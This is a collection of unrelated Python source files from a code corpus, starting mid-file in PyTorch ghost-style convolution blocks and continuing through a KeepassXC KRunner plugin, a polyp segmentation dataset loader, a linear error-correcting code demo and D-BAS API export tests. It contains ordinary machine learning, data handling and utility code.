**norm_kwargs) self.act = act_layer(inplace=True) self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2, bias=False, groups=final_oup, stride=s) self.bn4 = norm_layer(final_oup, **norm_kwargs) # ) else: self.identity = True # self.features = nn.Sequential( self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2, bias=False, groups=in_chs) self.bn1 = norm_layer(in_chs, **norm_kwargs) self.act = act_layer(inplace=True) self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False, groups=group_1x1) self.bn2 = norm_layer(oup, **norm_kwargs) self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False, groups=group_1x1) self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs) # act_layer(inplace=True), self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2, bias=False, groups=final_oup) self.bn4 = norm_layer(final_oup, **norm_kwargs) # ) if self.has_se: se_mode = 'large' if se_mode == 'large': se_frac = 0.5 se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer) self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac, **se_kwargs) else: se_frac = 1 se_kwargs = resolve_se_args(se_kwargs, out_chs, act_layer) self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac / exp_ratio, **se_kwargs) def forward(self, inputs, drop_path_rate=None): """ :param inputs: input tensor :param drop_path_rate: drop path rate (float, between 0 and 1) :return: output of block """ # Expansion and Depthwise Convolution # import pdb;pdb.set_trace() # x = self.features(inputs) if self.expand_ratio == 2: # first dwise conv x = self.act(self.bn1(self.dwise_conv1(inputs))) # first 1x1 conv ghost_id = x[:, self.ghost_idx_inp:, :, :] x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :])) # second 1x1 conv x = self.act(self.bn3(self.expand_layer(x))) # generate more features x = torch.cat([x, ghost_id], dim=1) # second dwise conv x = self.bn4(self.dwise_conv2(x)) elif self.inp != self.final_oup and self.s == 1: # first 1x1 conv x = self.bn2(self.project_layer(inputs)) # second 1x1 conv x = self.act(self.bn3(self.expand_layer(x))) elif self.inp != self.final_oup and self.s == 2: # first 1x1 conv x = self.bn2(self.project_layer(inputs)) # second 1x1 conv x = self.act(self.bn3(self.expand_layer(x))) # second dwise conv x = self.bn4(self.dwise_conv2(x)) else: # first dwise conv x = self.act(self.bn1(self.dwise_conv1(inputs))) # first 1x1 conv ghost_id = x[:, self.ghost_idx_inp:, :, :] x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :])) # second 1x1 conv x = self.act(self.bn3(self.expand_layer(x))) # second dwise conv x = torch.cat([x, ghost_id], dim=1) x = self.bn4(self.dwise_conv2(x)) # Squeeze-and-excitation if self.has_se: x = self.se(x) # Skip connection and drop connect # input_filters, output_filters = self.in_chs, self.out_chs # if self.identity and self._block_args.stride == 1 and input_filters == output_filters: # # import pdb;pdb.set_trace() # if drop_connect_rate: # x = drop_connect(x, p=drop_connect_rate, training=self.training) # x = x + inputs # skip connection # return x if self.identity: if self.drop_path_rate > 0.: x = drop_path(x, self.drop_path_rate, self.training) x = x + inputs return x else: return x class I2RBlock(nn.Module): """ Mobile Inverted Residual Bottleneck Block Args: block_args (namedtuple): BlockArgs, see above global_params (namedtuple): GlobalParam, see above Attributes: has_se (bool): Whether the block contains a Squeeze and Excitation layer. """ def __init__(self, in_chs, out_chs, dw_kernel_size=3, stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False, exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1, se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None, conv_kwargs=None, drop_path_rate=0., keep_3x3=False, group_1x1=2): super().__init__() norm_kwargs = norm_kwargs or {} conv_kwargs = conv_kwargs or {} mid_chs = make_divisible(in_chs * exp_ratio) self.has_se = se_ratio is not None and se_ratio > 0. self.has_residual = (in_chs == out_chs and stride == 1) and not noskip self.drop_path_rate = drop_path_rate self.expand_ratio = exp_ratio # Get static or dynamic convolution depending on image size # Conv2d = get_same_padding_conv2d(image_size=global_params.image_size) Conv2d = nn.Conv2d # Expansion phase inp = in_chs oup = in_chs // self.expand_ratio # number of output channels final_oup = out_chs self.inp, self.final_oup = inp, final_oup self.identity = False if oup < oup / 6.: oup = math.ceil(oup / 6.) oup = make_divisible(oup, 16) oup = make_divisible(oup, 2) k = dw_kernel_size s = stride # apply repeat scheme self.ghost_idx_inp = inp self.ghost_idx_oup = final_oup self.inp, self.final_oup, self.s = inp, final_oup, s # if self._block_args.expand_ratio != 1: # self._expand_conv = Conv2d(in_channels=inp, out_channels=oup, kernel_size=1, bias=False) # self._bn0 = nn.BatchNorm2d(num_features=oup, momentum=self._bn_mom, eps=self._bn_eps) if self.expand_ratio == 2: # self.features = nn.Sequential( self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2, bias=False, groups=in_chs) self.bn1 = norm_layer(in_chs, **norm_kwargs) self.act = act_layer(inplace=True) # first linear layer self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False, groups=group_1x1) self.bn2 = norm_layer(oup, **norm_kwargs) # sec linear layer self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False, groups=group_1x1) self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs) # act_layer(inplace=True), # expand layer self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2, bias=False, groups=final_oup, stride=s) self.bn4 = norm_layer(final_oup, **norm_kwargs) # ) elif inp != final_oup and s == 1: # self.features=nn.Sequential( self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False) self.bn2 = norm_layer(oup, **norm_kwargs) # only two linear layers are needed self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False) self.bn3 = norm_layer(final_oup, **norm_kwargs) self.act = act_layer(inplace=True) # ) elif in_chs != final_oup and s == 2: # self.features = nn.Sequential( self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False) self.bn2 = norm_layer(oup, **norm_kwargs) self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False) self.bn3 = norm_layer(final_oup, **norm_kwargs) self.act = act_layer(inplace=True) self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2, bias=False, groups=final_oup, stride=s) self.bn4 = norm_layer(final_oup, **norm_kwargs) # ) else: self.identity = True # self.features = nn.Sequential( self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2, bias=False, groups=in_chs) self.bn1 = norm_layer(in_chs, **norm_kwargs) self.act = act_layer(inplace=True) self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False, groups=group_1x1) self.bn2 = norm_layer(oup, **norm_kwargs) self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False, groups=group_1x1) self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs) # act_layer(inplace=True), self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2, bias=False, groups=final_oup) self.bn4 = norm_layer(final_oup, **norm_kwargs) # ) if self.has_se: se_mode = 'small' if se_mode == 'large': se_frac = 0.5 se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer) self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac, **se_kwargs) else: se_frac = 1 se_kwargs = resolve_se_args(se_kwargs, out_chs, act_layer) self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac / exp_ratio, **se_kwargs) def forward(self, inputs, drop_path_rate=None): """ :param inputs: input tensor :param drop_path_rate: drop path rate (float, between 0 and 1) :return: output of block """ # Expansion and Depthwise Convolution # import pdb;pdb.set_trace() # x = self.features(inputs) if self.expand_ratio == 2: # first dwise conv x = self.act(self.bn1(self.dwise_conv1(inputs))) # first 1x1 conv ghost_id = x[:, self.ghost_idx_inp:, :, :] x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :])) # second 1x1 conv x = self.act(self.bn3(self.expand_layer(x))) # generate more features x = torch.cat([x, ghost_id], dim=1) # second dwise conv x = self.bn4(self.dwise_conv2(x)) elif self.inp != self.final_oup and self.s == 1: # first 1x1 conv x = self.bn2(self.project_layer(inputs)) # second 1x1 conv x = self.act(self.bn3(self.expand_layer(x))) elif self.inp != self.final_oup and self.s == 2: # first 1x1 conv x = self.bn2(self.project_layer(inputs)) # second 1x1 conv x = self.act(self.bn3(self.expand_layer(x))) # second dwise conv x = self.bn4(self.dwise_conv2(x)) else: # first dwise conv x = self.act(self.bn1(self.dwise_conv1(inputs))) # first 1x1 conv ghost_id = x[:, self.ghost_idx_inp:, :, :] x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :])) # second 1x1 conv x = self.act(self.bn3(self.expand_layer(x))) # second dwise conv x = torch.cat([x, ghost_id], dim=1) x = self.bn4(self.dwise_conv2(x)) # Squeeze-and-excitation if self.has_se: x = self.se(x) # Skip connection and drop connect # input_filters, output_filters = self.in_chs, self.out_chs # if self.identity and self._block_args.stride == 1 and input_filters == output_filters: # # import pdb;pdb.set_trace() # if drop_connect_rate: # x = drop_connect(x, p=drop_connect_rate, training=self.training) # x = x + inputs # skip connection # return x if self.identity: if self.drop_path_rate > 0.: x = drop_path(x, self.drop_path_rate, self.training) x = x + inputs return x else: return x class CondConvResidual(InvertedResidual): """ Inverted residual block w/ CondConv routing""" def __init__(self, in_chs, out_chs, dw_kernel_size=3, stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False, exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1, se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None, num_experts=0, drop_path_rate=0.): self.num_experts = num_experts conv_kwargs = dict(num_experts=self.num_experts) super(CondConvResidual, self).__init__( in_chs, out_chs, dw_kernel_size=dw_kernel_size, stride=stride, dilation=dilation, pad_type=pad_type, act_layer=act_layer, noskip=noskip, exp_ratio=exp_ratio, exp_kernel_size=exp_kernel_size, pw_kernel_size=pw_kernel_size, se_ratio=se_ratio, se_kwargs=se_kwargs, norm_layer=norm_layer, norm_kwargs=norm_kwargs, conv_kwargs=conv_kwargs, drop_path_rate=drop_path_rate) self.routing_fn = nn.Linear(in_chs, self.num_experts) def forward(self, x): residual = x # CondConv routing pooled_inputs = F.adaptive_avg_pool2d(x, 1).flatten(1) routing_weights = torch.sigmoid(self.routing_fn(pooled_inputs)) # Point-wise expansion x = self.conv_pw(x, routing_weights) x = self.bn1(x) x = self.act1(x) # Depth-wise convolution x = self.conv_dw(x, routing_weights) x = self.bn2(x) x = self.act2(x) # Squeeze-and-excitation if self.se is not None: x = self.se(x) # Point-wise linear projection x = self.conv_pwl(x, routing_weights) x = self.bn3(x) if self.has_residual: if self.drop_path_rate > 0.: x = drop_path(x, self.drop_path_rate, self.training) x += residual return x class EdgeResidual(nn.Module): """ Residual block with expansion convolution followed by pointwise-linear w/ stride""" def __init__(self, in_chs, out_chs, exp_kernel_size=3, exp_ratio=1.0, fake_in_chs=0, stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False, pw_kernel_size=1, se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None, drop_path_rate=0.): super(EdgeResidual, self).__init__() norm_kwargs = norm_kwargs or {} if fake_in_chs > 0: mid_chs = make_divisible(fake_in_chs * exp_ratio) else: mid_chs = make_divisible(in_chs * exp_ratio) has_se = se_ratio is not None and se_ratio > 0. self.has_residual = (in_chs == out_chs and stride == 1) and not noskip self.drop_path_rate = drop_path_rate # Expansion convolution self.conv_exp = create_conv2d( in_chs, mid_chs, exp_kernel_size, stride=stride, dilation=dilation, padding=pad_type) self.bn1 = norm_layer(mid_chs, **norm_kwargs) self.act1 = act_layer(inplace=True) # Squeeze-and-excitation if has_se: se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer) self.se = SqueezeExcite(mid_chs, se_ratio=se_ratio, **se_kwargs) else: self.se = None # Point-wise linear projection self.conv_pwl = create_conv2d(mid_chs, out_chs, pw_kernel_size, padding=pad_type) self.bn2 = norm_layer(out_chs, **norm_kwargs) def feature_info(self, location): if location == 'expansion': # after SE, before PWL info = dict(module='conv_pwl', hook_type='forward_pre', num_chs=self.conv_pwl.in_channels) else: # location == 'bottleneck', block output info = dict(module='', hook_type='', num_chs=self.conv_pwl.out_channels) return info def forward(self, x): residual = x # Expansion convolution x = self.conv_exp(x) x = self.bn1(x) x = self.act1(x) # Squeeze-and-excitation if self.se is not None: x = self.se(x) # Point-wise linear projection x = self.conv_pwl(x) x = self.bn2(x) if self.has_residual: if self.drop_path_rate > 0.: x = drop_path(x, self.drop_path_rate, self.training) x += residual return x
StarcoderdataPython
319326
from indexor.indexor import Indexor
StarcoderdataPython
171076
# -*- coding: utf-8 -*- """Miscellaneous utilities.""" import gzip import os from subprocess import check_output # noqa:S404 __all__ = [ "obo_to_obograph", "obo_to_owl", ] def obo_to_obograph(obo_path, obograph_path) -> None: """Convert an OBO file to OBO Graph file with pronto.""" import pronto ontology = pronto.Ontology(obo_path) with gzip.open(obograph_path, "wb") as file: ontology.dump(file, format="json") def obo_to_owl(obo_path, owl_path, owl_format: str = "ofn"): """Convert an OBO file to an OWL file with ROBOT.""" args = ["robot", "convert", "-i", obo_path, "-o", owl_path, "--format", owl_format] ret = check_output( # noqa:S603 args, cwd=os.path.dirname(__file__), ) return ret.decode()
StarcoderdataPython
6706028
<reponame>Jie-Yuan/1_DataMining #!/usr/bin/env python # -*- coding: utf-8 -*- # @Project : iWork. # @File : DateTimeFeat # @Time : 2019-06-13 23:16 # @Author : yuanjie # @Email : <EMAIL> # @Software : PyCharm # @Description : import pandas as pd from tqdm import tqdm from datetime import timedelta tqdm.pandas() class DateTimeFeats(object): """ pandas_utils 时间/日期特征工程 常见格式: 1. 时间戳 2. 时间字符串 # 很强大: 解析不出为空 pd.to_datetime(ts, 'coerce', unit='s', infer_datetime_format=True) """ def __init__(self, include_feats=None): """ :param include_feats: 默认 ("year", "quarter", "month", "day", "hour", "minute", "week", "weekday", "weekofyear") weekofyear == week? TODO: + "DayOfWeekInMonth": 当月第几周 利用python获取某年中每个月的第一天和最后一天 """ self.time_granularity = ("year", "quarter", "month", "day", "hour", "minute", "week", "weekday", "weekofyear") self.feats = include_feats if include_feats else self.time_granularity def transform(self, s: pd.Series, add_prefix=None): if s.name is None: s.name = 'time_str' if add_prefix is None: add_prefix = f"{s.name}_" feats = self.feats _dtype = s.dtypes.__str__() if _dtype.__contains__('int') or _dtype.__contains__('float'): # 时间戳 10位是秒 13位是毫秒 print("infer_datetime_format: timestamp2date") ts = self.timestamp2date(s) else: print('infer_datetime_format: dateStr2date') ts = self.dateStr2date(s) _ = ts.progress_map(lambda t: list(self._func(t, feats))) df_ts = pd.DataFrame(_.tolist(), columns=feats).add_prefix(add_prefix) df_ts.insert(0, f'{s.name}2date', ts) return df_ts def _func(self, t, feats): for feat in feats: _ = t.__getattribute__(feat) if callable(_): yield _() else: yield _ def timestamp2date(self, ts): return pd.to_datetime(ts, 'coerce', unit='s', infer_datetime_format=True) def dateStr2date(self, ts): try: _ = ts.astype('datetime64[ns]') except Exception as e: print("astype('datetime64[ns]'): %s" % e) _ = pd.to_datetime(ts, 'coerce', infer_datetime_format=True) return _ def DayOfWeekInMonth(self, t): """ 获取指定的某天是某个月的第几周 周一为一周的开始 实现思路:就是计算当天在本年的第y周,本月一1号在本年的第x周,然后求差即可。 """ b = int((t - timedelta(t.day - 1)).strftime("%W")) e = int(t.strftime("%W")) return e - b + 1 if __name__ == '__main__': import pandas as pd ts = pd.Series([pd.datetime.today()] * 10) print(DateTimeFeats().transform(ts))
StarcoderdataPython
1692247
#!/bin/env python3 import time import signal from gi.repository import GLib import dbus.service from dbus.mainloop.glib import DBusGMainLoop from setproctitle import setproctitle, setthreadtitle from typing import List from .clipboard import Clipboard from .keepass import KeepassPasswords BUS_NAME = "de.naglfar.krunner-keepassxc" OBJ_PATH="/krunner" IFACE="org.kde.krunner1" class Runner(dbus.service.Object): kp: KeepassPasswords cp: Clipboard empty_action: str = "" last_match: float def __init__(self): DBusGMainLoop(set_as_default=True) sessionbus = dbus.SessionBus() sessionbus.request_name(BUS_NAME, dbus.bus.NAME_FLAG_REPLACE_EXISTING) bus_name = dbus.service.BusName(BUS_NAME, bus=sessionbus) dbus.service.Object.__init__(self, bus_name, OBJ_PATH) self.kp = KeepassPasswords() self.cp = Clipboard() self.last_match = 0 def start(self): setproctitle('krunner-keepassxc') setthreadtitle('krunner-keepassxc') loop = GLib.MainLoop() # clear saved data 15 seconds after last krunner match call def check_cache(): if self.last_match: now = time.time() if now - 15 > self.last_match: self.last_match = 0 self.kp.clear_cache() # return true to keep getting called, false to stop return True GLib.timeout_add(1000, check_cache) # handle sigint def sigint_handler(sig, frame): if sig == signal.SIGINT: print(' Quitting krunner-keepassxc') loop.quit() else: raise ValueError("Undefined handler for '{}'".format(sig)) signal.signal(signal.SIGINT, sigint_handler) # start the main loop loop.run() def copy_to_clipboard(self, string: str): if string: try: self.cp.copy(string) except NotImplementedError as e: print('neither xsel nor xclip seem to be installed', flush=True) except Exception as e: print(str(e), flush=True) @dbus.service.method(IFACE, out_signature='a(sss)') def Actions(self): # define our secondary action(s) if len(self.kp.labels) == 0: return [] else: return [ ('user', 'copy username', 'username-copy'), ] @dbus.service.method(IFACE, in_signature='s', out_signature='a(sssida{sv})') def Match(self, query: str) -> List: matches:List = [] if len(query) > 2: if not self.cp.can_clip: self.cp.check_executables() if not self.cp.can_clip: matches = [ ('', "Neither xsel nor xclip installed", "object-unlocked", 100, 0.1, {}) ] elif len(self.kp.labels) == 0: if not self.kp.is_keepass_installed(): matches = [ ('', "KeepassXC does not seem to be installed", "object-unlocked", 100, 0.1, {}) ] elif not self.kp.BUS_NAME: matches = [ ('', "DBUS bus name not found", "object-unlocked", 100, 0.1, { }) ] else: # no passwords found, show open keepass message matches = [ ('', "No passwords or database locked", "object-unlocked", 100, 0.1, { 'subtext': 'Open KeepassXC' }) ] self.empty_action = 'open-keepassxc' else: # find entries that contain the query items = [i for i in self.kp.labels if query.lower() in i.lower()] # sort entries starting with the query on top items.sort(key=lambda item: (not item.startswith(query), item)) # max 5 entries items = items[:5] matches = [ # data, display text, icon, type (Plasma::QueryType), relevance (0-1), properties (subtext, category and urls) (item, "Copy to clipboard: " + item, "object-unlocked", 100, (1 - (i * 0.1)), { 'subtext': self.kp.get_username(item) }) for i, item in enumerate(items) ] self.last_match = time.time() return matches @dbus.service.method(IFACE, in_signature='ss',) def Run(self, matchId: str, actionId: str): # matchId is data from Match, actionId is secondary action or empty for primary if len(matchId) == 0: # empty matchId means error of some kind if self.empty_action == 'open-keepassxc': self.kp.open_keepass() else: if actionId == 'user': user = self.kp.get_username(matchId) self.copy_to_clipboard(user) else: secret = self.kp.get_secret(matchId) self.copy_to_clipboard(secret) # clear all cached data on action self.kp.clear_cache() # clear last_match to skip needless check_cache self.last_match = 0 self.empty_action = ""
StarcoderdataPython
1917257
<gh_stars>1-10 import os import time import numpy as np from dataset_loaders.parallel_loader import ThreadedDataset floatX = 'float32' class Polyps912Dataset(ThreadedDataset): '''The Endoluminal Scene Segmentation (EndoScene) of Colonoscopy Images benchmark The EndoScene dataset [1]_ consists of 912 frames extracted from 44 colonoscopy sequences of 36 patients. The dataset combines both CVC-ColonDB and CVC-ClinicDB datasets of [2]_ and extends the dataset annotations to account for 4 different semantic classes. This loader is intended for the EndoScene dataset version containing 2 semantic classes, namely polyp and background, plus a void class annotating the border of the images. However, it could be easily adapted to account for 3 or 4 classes. The dataset should be downloaded from [1]_ into the `shared_path` (that should be specified in the config.ini according to the instructions in ../README.md). Parameters ---------- which_set: string A string in ['train', 'val', 'valid', 'test'], corresponding to the set to be returned. References ---------- .. [1] http://adas.cvc.uab.es/endoscene/ .. [2] https://endovis.grand-challenge.org/ ''' name = 'polyps912' non_void_nclasses = 2 _void_labels = [2] # optional arguments _cmap = { 0: (0, 0, 0), # Background 1: (255, 255, 255), # Polyp 2: (128, 128, 128), # Void } _mask_labels = {0: 'Background', 1: 'Polyp', 2: 'Void'} _filenames = None @property def filenames(self): import glob if self._filenames is None: # Load filenames filenames = [] # Get file names from images folder file_pattern = os.path.join(self.image_path, "*.bmp") file_names = glob.glob(file_pattern) # print (str(file_names)) # Get raw filenames from file names list for file_name in file_names: path, file_name = os.path.split(file_name) file_name, ext = os.path.splitext(file_name) filenames.append(file_name) # print (file_name) # Save the filenames list self._filenames = filenames return self._filenames def __init__(self, which_set='train', *args, **kwargs): # Put which_set in canonical form: training, validation or testing if which_set in ("train", "training"): self.which_set = "train" elif which_set in ("val", "valid", "validation"): self.which_set = "valid" elif which_set in ("test", "testing"): self.which_set = "test" else: raise ValueError("Unknown set requested: %s" % which_set) # Define the images and mask paths self.image_path = os.path.join(self.path, self.which_set, 'images') self.mask_path = os.path.join(self.path, self.which_set, 'masks2') super(Polyps912Dataset, self).__init__(*args, **kwargs) def get_names(self): """Return a dict of names, per prefix/subset.""" return {'default': self.filenames} def load_sequence(self, sequence): """Load a sequence of images/frames Auxiliary function that loads a sequence of frames with the corresponding ground truth and their filenames. Returns a dict with the images in [0, 1], their corresponding labels, their subset (i.e. category, clip, prefix) and their filenames. """ from skimage import io image_batch, mask_batch, filename_batch = [], [], [] for prefix, img_name in sequence: img = io.imread(os.path.join(self.image_path, img_name + ".bmp")) img = img.astype(floatX) / 255. mask = np.array(io.imread(os.path.join(self.mask_path, img_name + ".tif"))) mask = mask.astype('int32') # Add to minibatch image_batch.append(img) mask_batch.append(mask) filename_batch.append(img_name) ret = {} ret['data'] = np.array(image_batch) ret['labels'] = np.array(mask_batch) ret['subset'] = prefix ret['filenames'] = np.array(filename_batch) return ret def test(): trainiter = Polyps912Dataset( which_set='train', batch_size=10, seq_per_subset=0, seq_length=0, data_augm_kwargs={ 'crop_size': (288, 384)}, return_one_hot=True, return_01c=True, return_list=True, use_threads=False) validiter = Polyps912Dataset( which_set='valid', batch_size=1, seq_per_subset=0, seq_length=0, return_one_hot=True, return_01c=True, return_list=True, use_threads=False) testiter = Polyps912Dataset( which_set='test', batch_size=1, seq_per_subset=0, seq_length=0, return_one_hot=True, return_01c=True, return_list=True, use_threads=False) # Get number of classes nclasses = trainiter.nclasses print ("N classes: " + str(nclasses)) void_labels = trainiter.void_labels print ("Void label: " + str(void_labels)) # Training info train_nsamples = trainiter.nsamples train_batch_size = trainiter.batch_size train_nbatches = trainiter.nbatches print("Train n_images: {}, batch_size: {}, n_batches: {}".format( train_nsamples, train_batch_size, train_nbatches)) # Validation info valid_nsamples = validiter.nsamples valid_batch_size = validiter.batch_size valid_nbatches = validiter.nbatches print("Validation n_images: {}, batch_size: {}, n_batches: {}".format( valid_nsamples, valid_batch_size, valid_nbatches)) # Testing info test_nsamples = testiter.nsamples test_batch_size = testiter.batch_size test_nbatches = testiter.nbatches print("Test n_images: {}, batch_size: {}, n_batches: {}".format( test_nsamples, test_batch_size, test_nbatches)) start = time.time() tot = 0 max_epochs = 1 for epoch in range(max_epochs): for mb in range(train_nbatches): train_group = trainiter.next() if train_group is None: raise RuntimeError('One batch was missing') # train_group checks assert train_group[0].ndim == 4 assert train_group[0].shape[0] <= train_batch_size assert train_group[0].shape[1:] == (288, 384, 3) assert train_group[0].min() >= 0 assert train_group[0].max() <= 1 assert train_group[1].ndim == 4 assert train_group[1].shape[0] <= train_batch_size assert train_group[1].shape[1:] == (288, 384, nclasses) # time.sleep approximates running some model time.sleep(1) stop = time.time() part = stop - start - 1 start = stop tot += part print("Minibatch %s time: %s (%s)" % (str(mb), part, tot)) def run_tests(): test() if __name__ == '__main__': run_tests()
StarcoderdataPython
1984198
<filename>hamming2.py # код (n, k) n -- символов в код. слове, k -- символов в сообщении # пор. мат. G размера k×n # пров. мат. H размер (n-k)×n G = [ [1, 0, 0, 0, 1, 1, 0], [0, 1, 0, 0, 1, 0, 1], [0, 0, 1, 0, 0, 1, 1], [0, 0, 0, 1, 1, 1, 1], ] # (7, 4) import numpy as np G = np.array(G) print(G.T) # In[0] H = np.array([ [1, 1, 0, 1, 1, 0, 0], [1, 0, 1, 1, 0, 1, 0], [0, 1, 1, 1, 0, 0, 1], ]) # H×G(T) = 0 (mod q) np.matmul(H,G.T) % 2 # In[0] def getH(G, p=2): k, n = G.shape H = np.zeros(shape=(n-k, n)) for i in range(k, n): H[i-k, i] = 1 for i in range(k): for j in range(k, n): H[j-k, i] = p - G[i, j] return H # In[0] import itertools def allVectors(len, base=2): return (np.array(i) for i in itertools.product(range(base), repeat=len)) # In[0] def lincode(G, p=2): k,n = G.shape def encode(m): return np.reshape(np.matmul(G.T, np.reshape(np.array(m), (k, 1))) % p, n) d = min(np.count_nonzero(encode(m)) for m in itertools.islice(allVectors(k, p), 1, None)) ec = (d-1)//2 print(f"Code distance is {d}, can correct {ec} errors") H = getH(G, p) tbl = {} for ei in allVectors(n, p): if 0 < np.count_nonzero(ei) <= ec: si = np.reshape(np.matmul(H, ei) % p, n-k) tbl[str(si)] = np.reshape(ei, n) def decode(c): s = np.reshape(np.matmul(H, c) % p, n-k) if np.count_nonzero(s) == 0: return c[:k] e = tbl[str(s)] c1 = c - e return c1[:k] return (encode, decode) encode, decode = lincode(G = np.array([ [1, 0, 0, 0, 0, 0, 1, 1, 1, 1], [0, 1, 0, 0, 0, 1, 0, 1, 1, 1], [0, 0, 1, 0, 0, 1, 1, 0, 1, 1], [0, 0, 0, 1, 0, 1, 1, 1, 0, 1], [0, 0, 0, 1, 1, 1, 1, 1, 1, 0], ]), p=4) # (10, 5) decode(encode([2,0,3,0,0])+np.array([2,0,0,0,0,0,0,0,0,0]))
StarcoderdataPython
265834
# -*- coding: utf-8 -*- # Generated by Django 1.11.1 on 2017-12-08 06:13 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('bicycleparking', '0002_auto_20171129_0126'), ('bicycleparking', '0002_auto_20171129_0128'), ] operations = [ ]
StarcoderdataPython
11352168
from pathlib import Path DATA_DIR = Path(__file__).resolve().parent
StarcoderdataPython
9755674
import logging import os import shutil from oslo_config import cfg LOG = logging.getLogger(__name__) def execute(filename, formatted_name): """Renames a file based on the name generated using metadata. :param str filename: absolute path and filename of original file :param str formatted_name: absolute path and new filename """ if os.path.isfile(formatted_name): # If the destination exists, skip rename unless overwrite enabled if not cfg.CONF.overwrite_file_enabled: LOG.info('File %s already exists not forcefully moving %s', formatted_name, filename) return LOG.info('renaming [%s] to [%s]', filename, formatted_name) if not cfg.CONF.dryrun: shutil.move(filename, formatted_name)
StarcoderdataPython
8147422
<reponame>hhucn/dbas<filename>api/tests/test_exports.py import arrow from webtest.response import TestResponse from api.exports import import_aif from api.tests.test_views import create_request_with_token_header from dbas.database.discussion_model import Issue from dbas.tests.utils import TestCaseWithConfig, test_app class SaneAIF(TestCaseWithConfig): def test_cat_or_dog_aif(self): response: TestResponse = test_app().get("/api/cat-or-dog/aif") self.assertEqual(response.status_code, 200) self.assertIn("nodes", response.json_body) self.assertIn("edges", response.json_body) self.assertIn({ "nodeID": "statement_24", "text": "the fact, that cats are capricious, is based on the cats race", "type": "I", "timestamp": "2017-08-09T11:25:09.222604+00:00" }, response.json_body["nodes"]) self.assertIn({ "edgeID": "argument_4_edge_out", "toID": "statement_3", "fromID": "argument_4" }, response.json_body["edges"]) def test_import_not_allowed_for_normie(self): import_response = import_aif(create_request_with_token_header(nickname="Walter", match_dict={"slug": "cat-or-dog-2"}, params={"title": "Cat or Dog 2", "lang": "en"}, json_body={})) self.assertEqual(import_response.status_code, 401) def test_import(self): self.config.testing_securitypolicy(userid='Tobias', permissive=True) import_response = import_aif(create_request_with_token_header(nickname="Tobias", match_dict={"slug": "my-new-issue"}, params={"title": "My new Issue", "lang": "en"}, json_body={ "nodes": [ { "nodeID": "argument_1", "type": "CA", "timestamp": "2017-08-19T11:25:09.347038+00:00" }, { "nodeID": "statement_1", "text": "This is a Position", "type": "I", "timestamp": "2017-08-16T11:25:09.222796+00:00" }, { "nodeID": "statement_2", "text": "This is a Premise", "type": "I", "timestamp": "2017-08-16T11:25:09.222796+00:00" }], "edges": [ { "edgeID": "argument_1_edge_out", "fromID": "argument_1", "toID": "statement_1" }, { "edgeID": "argument_1_edge_in_from_18", "fromID": "statement_2", "toID": "argument_1" } ] })) self.assertEqual(import_response.status_code, 201) new_issue = Issue.by_slug("my-new-issue") self.assertEqual(new_issue.lang, "en") self.assertCountEqual([position.get_text() for position in new_issue.positions], ["This is a Position"]) self.assertCountEqual([statement.get_text() for statement in new_issue.statements], ["This is a Position", "This is a Premise"]) self.assertEqual(new_issue.positions[0].get_timestamp(), arrow.get("2017-08-16T11:25:09.222796+00:00")) self.assertEqual(new_issue.positions[0].arguments[0].timestamp, arrow.get("2017-08-19T11:25:09.347038+00:00")) self.assertFalse(new_issue.positions[0].arguments[0].is_supportive, "Argument with type CA should parse to supportive: False") class SaneDot(TestCaseWithConfig): def test_cat_or_dog_dot(self): response: TestResponse = test_app().get("/api/cat-or-dog/dot") self.assertEqual(200, response.status_code) self.assertIsInstance(response.body, bytes)
StarcoderdataPython
6631991
